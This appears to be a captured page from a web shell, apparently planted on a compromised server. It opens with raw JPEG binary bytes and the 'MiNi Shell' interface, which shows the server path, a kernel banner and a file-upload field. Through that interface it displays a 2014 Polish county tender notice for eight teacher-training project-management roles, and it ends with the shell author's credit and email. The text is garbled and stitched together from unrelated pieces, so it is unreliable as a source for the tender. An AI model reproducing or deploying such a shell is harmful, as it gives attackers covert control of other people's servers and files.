JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140211/48256-N-2014.html

<p class="kh_header"><b>Strzelce Krajeńskie: Świadczenie usług zarządzania projektem w podziale na 8 zadań częściowych,  w ramach projektu pn.: Rozwijanie kwalifikacji zawodowych nauczycieli w Powiecie Strzelecko-Drezdeneckim.</b><br>
<b>Numer ogłoszenia: 48256 - 2014; data zamieszczenia: 11.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Strzelecko-Drezdenecki , ul. Ks. St. Wyszyńskiego 7, 66-500 Strzelce Krajeńskie, woj. lubuskie, tel. 095 7632380, faks 095 7631126.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.fsd.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług zarządzania projektem w podziale na 8 zadań częściowych,  w ramach projektu pn.: Rozwijanie kwalifikacji zawodowych nauczycieli w Powiecie Strzelecko-Drezdeneckim..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługa priorytetowa o kodzie CPV: CPV 79421000-1 Przedmiotem zamówienia jest świadczenie usług zarządzania projektem w podziale na 8 zadań częściowych, w ramach projektu pn.: Rozwijanie kwalifikacji zawodowych nauczycieli w Powiecie Strzelecko-Drezdeneckim. 
Definicja personelu projektu została określona w Wytycznych ws. zasad finansowania POKL. Zgodnie z tą definicją wszystkie osoby zaangażowane do realizacji zadań wykonują je osobiście. Osobiste wykonywanie zadań należy odróżnić od zlecania usług podmiotom gospodarczym, które za pośrednictwem osób trzecich wykonują usługę. 
Zamawiający stosując się do Wytycznych stawia warunek, że ubiegać o zamówienie mogą się osoby fizyczne, osoby fizyczne prowadzące działalność gospodarczą, osoby współpracujące przy prowadzeniu pozarolniczej działalności, które usługę będą wykonywać osobiście świadczenie osobiste, zatem z jednym wykonawcą może zostać zawarta umowa tylko na jedną część zamówienia. 
Część 1: Szkolny Organizator Rozwoju Edukacji nr 1 SORE nr 1. Do zadań SORE nr 1 należą w szczególności: koordynacja prac projektowych w szkole, przygotowanie merytoryczne narzędzi do rocznego planu wspomagania, analiza dokumentacji szkolnej, wywiady z dyrektorami szkół, spotkania indywidualne z wychowawcami i pedagogami i nauczycielami, przygotowanie rocznego planu wspomagania, przygotowywanie materiałów i spotkania z radami pedagogicznymi, zaplanowanie form wsparcia w ramach wybranych ofert oraz potrzebnych do tego materiałów, literatury, pomocy, poczęstunków, określenie wymogów i pomoc w pozyskaniu realizatorów form wsparcia, obserwacja i wsparcie w realizacji rocznego planu wspomagania, ewaluacja i raport z realizacji rocznego planu wspomagania, bieżący kontakt z Koordynatorem projektu, przygotowywanie informacji i raportów  z realizowanych działań dla Koordynatora projektu, udział w spotkaniach zespołu projektowego, bezpośrednia promocja projektu, pomoc w rekrutacji nauczycieli i przekazywanie informacji do asystenta koordynatora projektu, każdorazowe poddawanie się kontroli na wezwania instytucji organów kontrolnych, wykonywanie innych zadań zleconych przez Koordynatora Projektu. Wykonawca będzie zobowiązany do wykonywania usługi do 31.08.2015 roku, łącznie w okresie wykonywania usługi zobowiązany jest przepracować 2400 godzin, nie mniej niż 120 godzin miesięcznie.
Część 2: Szkolny Organizator Rozwoju Edukacji nr 2 SORE nr 2 Do zadań SORE nr 2 należą w szczególności: koordynacja prac projektowych w szkole, przygotowanie merytoryczne narzędzi do RPW, analiza dokumentacji szkolnej, wywiady z dyrektorami szkół, spotkania indywidualne z wychowawcami i pedagogami i nauczycielami, przygotowanie rocznego planu wspomagania,
przygotowywanie materiałów i spotkania z radami pedagogicznymi, zaplanowanie form wsparcia w ramach wybranych ofert oraz potrzebnych do tego materiałów, literatury, pomocy, poczęstunków, określenie wymogów i pomoc w pozyskaniu realizatorów form wsparcia, obserwacja i wsparcie w realizacji rocznego planu wspomagania, ewaluacja i raport z realizacji rocznego planu wspomagania, bieżący kontakt z Koordynatorem projektu, przygotowywanie informacji i raportów  z realizowanych działań dla Koordynatora projektu, udział w spotkaniach zespołu projektowego, bezpośrednia promocja projektu, pomoc w rekrutacji nauczycieli i przekazywanie informacji do asystenta koordynatora projektu, każdorazowe poddawanie się kontroli na wezwania instytucji organów kontrolnych, wykonywanie innych zadań zleconych przez Koordynatora Projektu. Wykonawca będzie zobowiązany do wykonywania usługi do 31.08.2015 roku, łącznie w okresie wykonywania usługi zobowiązany jest przepracować 2400 godzin, nie mniej niż 120 godzin miesięcznie.
Część 3: Koordynator Sieci nr 1 KS nr 1. Do zadań KS nr 1 należą w szczególności: pomoc w rekrutacji nauczycieli i przekazywanie informacji do asystenta ds. merytorycznych, przygotowanie merytoryczne spotkań dla przydzielonej sieci, określenie planu pracy zespołu w tym celów, form i efektów, zapoznanie członków sieci z planem i harmonogramem oraz bezpośrednia promocja projektu, przygotowanie organizacyjne spotkań, w tym pomoc w pozyskaniu specjalistów, organizacja poczęstunku, przygotowanie narzędzi, literatury, koordynacja prac na platformie internetowej, przygotowywanie sprawozdań z pracy sieci kwartalne i końcowe, zbieranie dokumentacji z realizacji zadania, udział w spotkaniach zespołu projektowego na wezwanie Koordynatora projektu, wykonywanie innych zadań zleconych przez Koordynatora projektu, każdorazowe poddawanie się kontroli na wezwania instytucji organów kontrolnych. Wykonawca będzie zobowiązany do wykonywania usługi do 31.08.2015 roku, łącznie w okresie wykonywania usługi zobowiązany jest przepracować 2400 godzin, nie mniej niż 120 godzin miesięcznie.
Część 4: Koordynator Sieci nr 2 KS nr 2 Do zadań KS nr 2 należą w szczególności: pomoc w rekrutacji nauczycieli i przekazywanie informacji do asystenta ds. merytorycznych projektu,
przygotowanie merytoryczne spotkań dla przydzielonej sieci, określenie planu pracy zespołu w tym celów, form i efektów, zapoznanie członków sieci z planem i harmonogramem oraz bezpośrednia promocja projektu, przygotowanie organizacyjne spotkań, w tym pomoc w pozyskaniu specjalistów, organizacja poczęstunku, przygotowanie narzędzi, literatury, koordynacja prac na platformie internetowej, przygotowywanie sprawozdań z pracy sieci kwartalne i końcowe, zbieranie dokumentacji z realizacji zadania, udział w spotkaniach zespołu projektowego na wezwanie Koordynatora projektu, wykonywanie innych zadań zleconych przez Koordynatora projektu, każdorazowe poddawanie się kontroli na wezwania instytucji organów kontrolnych. Wykonawca będzie zobowiązany do wykonywania usługi do 31.08.2015 roku, łącznie w okresie wykonywania usługi zobowiązany jest przepracować 2400 godzin, nie mniej niż 120 godzin miesięcznie.
Część 5: Osoba odpowiedzialna za Powiatowy Program Wspomagania PPW Do zadań osoby odpowiedzialnej za PPW należy w szczególności: zbieranie informacji od Szkolnego Organizatora Rozwoju Edukacji i Koordynatora Sieci na temat przeprowadzonej diagnozy, zidentyfikowanych problemów wybranych ofert oraz form ich realizacji powołanych sieci, analiza wszystkich zebranych dokumentów i informacji, opracowanie Powiatowego Programu Wspomagania wraz z wyznaczeniem kierunku działań dla całego programu, monitoring Powiatowego Programu Wspomagania poprzez bieżący monitoring realizacji rocznego planu wspomagania w każdej szkole, bieżące spotkania ze Szkolnym Organizatorem Rozwoju Edukacji i Koordynatorem Sieci,
opracowanie raportu Powiatowego Programu Wspomagania, ze wskazaniem działań, które zakończyły się sukcesem oraz działań, które wymagają udoskonalenia, każdorazowe poddawanie się kontroli na wezwania instytucji organów kontrolnych, wykonywanie innych zadań zleconych przez Koordynatora Projektu. Wykonawca będzie zobowiązany do wykonywania usługi do 31.08.2015 roku, łącznie w okresie wykonywania usługi zobowiązany jest przepracować 1600 godzin, nie mniej niż 80 godzin miesięcznie.
Część 6: Kierownik Projektu Do zadań KP należą w szczególności: przejęcie odpowiedzialności za całość realizacji projektu, w szczególności zarządzanie przedsięwzięciami we wszystkich jego etapach, nadzór nad zgodnością prowadzonych działań z postanowieniami zawartymi we wniosku o dofinansowanie, w tym z budżetem i harmonogramem; koordynowanie działań projektowych, w tym merytorycznych i logistycznych; kierowanie wykonaniem projektu;
nadzorowanie bieżących postępów w realizacji projektu; nadzór nad kadrą zarządzającą;
nadzór nad realizacją zadań merytorycznych; organizowanie i prowadzenie spotkań zespołu projektowego; zbieranie i analiza składanych sprawozdań, utrzymanie stałych kontaktów z opiekunami projektu w Instytucji Pośredniczącej II stopnia oraz ze SP biorącymi udział w projekcie; współpraca z kontrahentami; nadzór na opracowaniem szczegółowego harmonogramy zajęć; nadzór nad monitoringiem i ewaluacją projektu; nadzór nad wydatkowaniem środków w projekcie; odpowiedzialność za rekrutację; opracowanie materiałów promocyjnych i zorganizowanie kampanii promocyjno-informacyjnej; współpraca przy sporządzaniu dokumentacji sprawozdawczej projektu; przestrzeganie procedur i instrukcji związanych z realizacją projektu; przeprowadzenie szkolenia z równości szans; każdorazowe poddawanie się kontroli na wezwania instytucji organów kontrolnych. Wykonawca będzie zobowiązany do wykonywania usługi do 31.08.2015 roku, łącznie w okresie wykonywania usługi zobowiązany jest przepracować 2400 godzin, nie mniej niż 120 godzin miesięcznie. 
Część 7: Asystent ds. Merytorycznych AdsM Do zadań AdsM należą w szczególności: pomoc Koordynatorowi projektu w wypełnianiu jego obowiązków, odpowiedzialność za sporządzanie i poprawianie wniosków o płatność, odpowiedzialność za sprawy finansowe projektu i kontrola wydatków z budżetu projektu, sporządzanie dokumentacji sprawozdawczej projektu, raportowanie i sporządzanie analiz dotyczących projektu na zlecenie KP, wprowadzanie danych do bazy PEFS, w ramach przedmiotowego zadania wykonawcę zobowiązuje się do: pozyskania od odbiorców usług zgodę na udział  w projekcie oraz zgodę na przetwarzanie danych osobowych tychże osób, zgoda powinna mieć formę pisemną i zawierać informacje i oświadczenia zgodne z ustawą 29 sierpnia 1997 r. o ochronie danych osobowych Dz. U. z 2002, Nr 101, poz. 926 ze zm. zm., wykonawca obowiązany jest do weryfikacji dokumentów zawierających zgody pod kątem autentyczności, poprawności ich uzupełnienia i skuteczności prawnej, wykonawca gromadzi uzupełnione deklaracje i przechowuje je do czasu przekazania Zamawiającemu na jego wezwanie, wykonawca przygotuje dla Zamawiającego bazy danych uczestników projektu i dokona ich należytego zabezpieczenia, dane osobowe mogą być przetwarzane przez wykonawcę wyłącznie w celu udzielenia wsparcia, realizacji, ewaluacji, monitoringu i sprawozdawczości w ramach realizacji przedmiotu umowy, wykonawca oświadcza, że podczas przetwarzania danych osobowych przestrzegać będzie zasad wskazanych w niniejszym paragrafie, w ustawie z dnia 29 sierpnia 1997 r. o ochronie danych osobowych Dz. U. z 2002, Nr 101, poz. 926 ze zm. oraz w rozporządzeniu Ministra Spraw Wewnętrznych i Administracji z dnia 29 kwietnia 2004 r. w sprawie dokumentacji przetwarzania danych osobowych oraz warunków technicznych i organizacyjnych, jakim powinny odpowiadać urządzenia i systemy informatyczne służące do przetwarzania danych osobowych (Dz. U. nr 100, poz. 1024), wykonawca przed rozpoczęciem przetwarzania danych osobowych podejmie środki zabezpieczające zbiór danych, o których mowa w art. 36 - 39 ustawy o ochronie danych osobowych oraz w aktach wykonawczych, wykonawca jest obowiązany do podjęcia wszelkich kroków służących zachowaniu danych osobowych w tajemnicy przez pracowników mających dostęp do danych osobowych, wykonawca niezwłocznie poinformuje Zamawiającego o: wszelkich przypadkach naruszenia tajemnicy danych osobowych lub o ich niewłaściwym użyciu; wszelkich czynnościach z własnym udziałem w sprawach dotyczących ochrony danych osobowych prowadzonych w szczególności przed Generalnym Inspektorem Ochrony Danych Osobowych, urzędami państwowymi, policją lub przed sądem; wykonawca zobowiązuje się do udzielenia Zamawiającemu, na każde żądanie, informacji na temat przetwarzania danych osobowych, o którym mowa w niniejszym paragrafie, a w szczególności niezwłocznego przekazywania informacji o każdym przypadku naruszenia przez niego obowiązków dotyczących ochrony danych osobowych, wykonawca umożliwi Zamawiającemu, w miejscach, w których są przetwarzane powierzone dane osobowe, dokonanie kontroli, w terminie wspólnie ustalonym, nie późniejszym jednak niż 5 dni kalendarzowych od dnia powiadomienia Wykonawcy przez Zamawiającego, o zamiarze przeprowadzenia kontroli w celu sprawdzenia prawidłowości przetwarzania oraz zabezpieczenia danych osobowych, w przypadku powzięcia przez Zamawiającego wiadomości o rażącym naruszeniu przez Wykonawcę zobowiązań wynikających z ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych, z rozporządzenia, o którym mowa w ust. 4, lub z niniejszej umowy, Wykonawca umożliwi Zamawiającemu, dokonanie niezapowiedzianej kontroli, wykonawca jest obowiązany do zastosowania się do zaleceń dotyczących poprawy jakości zabezpieczenia danych osobowych oraz sposobu ich przetwarzania sporządzonych w wyniku przeprowadzonych przez Zamawiającego lub inne instytucje upoważnione do kontroli na podstawie odrębnych przepisów.
monitoring beneficjentów projektu, każdorazowe poddawanie się kontroli na wezwania instytucji organów kontrolnych, prowadzenie nadzoru projektu pod względem zgodności z wymogami określonymi dla zadań współfinansowanych ze środków EFS,wykonywanie innych zadań zleconych przez KP. Wykonawca będzie zobowiązany do wykonywania usługi do 31.08.2015 roku, łącznie w okresie wykonywania usługi zobowiązany jest przepracować 2400 godzin, nie mniej niż 120 godzin miesięcznie. 
Część 8: Księgowy Do zadań księgowego należy w szczególności: odpowiedzialność za prawidłowe księgowanie dowodów księgowych w projekcie, prowadzenie dokumentacji księgowej, każdorazowe poddawanie się kontroli na wezwania instytucji organów kontrolnych;
Wykonywanie innych zadań zleconych przez Kierownika Projektu KP. Wykonawca będzie zobowiązany do wykonywania usługi do 31.08.2015 roku, łącznie w okresie wykonywania usługi zobowiązany jest przepracować  960 godzin, nie mniej niż 48 godzin miesięcznie..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnia/ nie spełnia.
- Wykonawcy przedłożą oświadczenie na załączonym druku - załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnia/ nie spełnia.
Wykonawcy przedłożą oświadczenie na załączonym druku - załącznik nr 2 do SIWZ;
Wykonawcy przedłożą wykaz usług - załącznik nr 5 do SIWZ;
Ponadto:
część 1 i 2: 
doświadczenie w pracy w systemie oświaty min. 5 lat,
ukończenie szkolenia dla szkolnych organizatorów rozwoju edukacji SORE,
posiadanie wykształcenia wyższego,
ukończone szkolenie z równości szans kobiet i mężczyzn w projektach.
część 3 i 4: 
doświadczenie w pracy w systemie oświaty min. 5 lat,
posiadanie wykształcenia wyższego,
ukończone szkolenie z równości szans kobiet i mężczyzn w projektach.
część 5: 
doświadczenie w pracy w systemie oświaty min. 1 rok,
posiadanie wykształcenia wyższego,
ukończone szkolenie z równości szans kobiet i mężczyzn w projektach.
część 6: 
doświadczenie w realizacji projektów Programu Operacyjnego Kapitał Ludzki min. 2 lata,
posiadanie wykształcenia wyższego,
ukończone szkolenie z równości szans kobiet i mężczyzn w projektach.
część 7: 
doświadczenie w rozliczaniu projektów PO KL min. 1 rok,
posiadanie wykształcenia wyższego,
ukończone szkolenie z równości szans kobiet i mężczyzn w projektach.
część 8: 
doświadczenie w pracy samodzielnego księgowego min. 1 rok,
posiadanie wykształcenia średniego,
ukończone szkolenie z równości szans kobiet i mężczyzn w projektach.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnia/ nie spełnia.
Wykonawcy przedłożą oświadczenie na załączonym druku - załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnia/ nie spełnia.
Wykonawcy przedłożą oświadczenie na załączonym druku - załącznik nr 2 do SIWZ .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy przedłożą oświadczenie na załączonym druku- załącznik nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- wypełniony formularz ofertowy (załącznik nr 1 do SIWZ), oświadczenie dotyczące grupy kapitałowej (załącznik nr 3 do SIWZ), parafowany wzór umowy (załącznik nr 6 do SIWZ), pełnomocnictwo (jeżeli upoważniono osobę (-y) do reprezentacji)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega, że może nastąpić wydłużenie terminu realizacji umowy w wypadku, gdyby nastąpiły opóźnienia związane z realizacją projektu, wynikające z przyczyn leżących po stronie Zamawiającego lub Instytucji Pośredniczącej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> archiwum.bip.fsd.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Strzelcach Krajeńskich ul. Ks. St. Wyszyńskiego 7 66-500 Strzelce Krajeńskie, II piętro pokoje nr: 212 oraz 213..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.02.2014 godzina 10:00, miejsce: Sekretariat Starostwa Powiatowego w Strzelcach Krajeńskich ul. Ks. St. Wyszyńskiego 7 66-500 Strzelce Krajeńskie, I piętro pokój nr 103..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki.
Priorytet III Wysoka jakość systemu oświaty
Działanie 3.5. Kompleksowe wspomaganie rozwoju szkół..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com